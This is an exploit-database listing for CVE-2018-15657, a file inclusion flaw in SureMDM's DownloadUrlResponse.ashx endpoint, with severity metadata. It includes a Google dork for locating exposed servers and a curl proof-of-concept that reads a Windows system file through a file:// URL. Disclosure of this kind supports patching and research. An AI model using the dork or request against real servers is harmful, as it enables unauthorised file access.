Advertisement






SureMDM Local / Remote File Inclusion

CVE Category Price Severity
CVE-2018-15657 CWE-Other $5,000 High
Author Risk Exploitation Type Date
Oliver Seldman High Local/Remote 2019-02-02
CPE
cpe:cpe:/a:suremdm:secure:7.9
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H 0.07 0.8733

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020020

Below is a copy:

SureMDM Local / Remote File Inclusion
# Exploit Title: SureMDM LFI/RFI (Prior to 2018-11 Patch)
# Google Dork: inurl:/api/DownloadUrlResponse.ashx
# Date: 2019-02-01
# Exploit Author: Digital Interruption
# Vendor Homepage: https://www.42gears.com/
# Software Link: https://www.42gears.com/products/suremdm-home/
# Version: Versions prior to the November 2018 patch
# Tested on: Windows
# CVE : CVE-2018-15657

An attacker can force the web server to request remote files and display the output by placing any arbitrary URL in the "url" parameter of /api/DownloadUrlResponse.ashx. This can also be utilised to request files from the local file system by using the file:// URI syntax, such as file://C:/WINDOWS/System32/drivers/etc/hosts

Proof of concept: curl -H "ApiKey: apiKey" http://target/api/DownloadUrlResponse.ashx?url=file://C:/WINDOWS/System32/drivers/etc/hosts

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum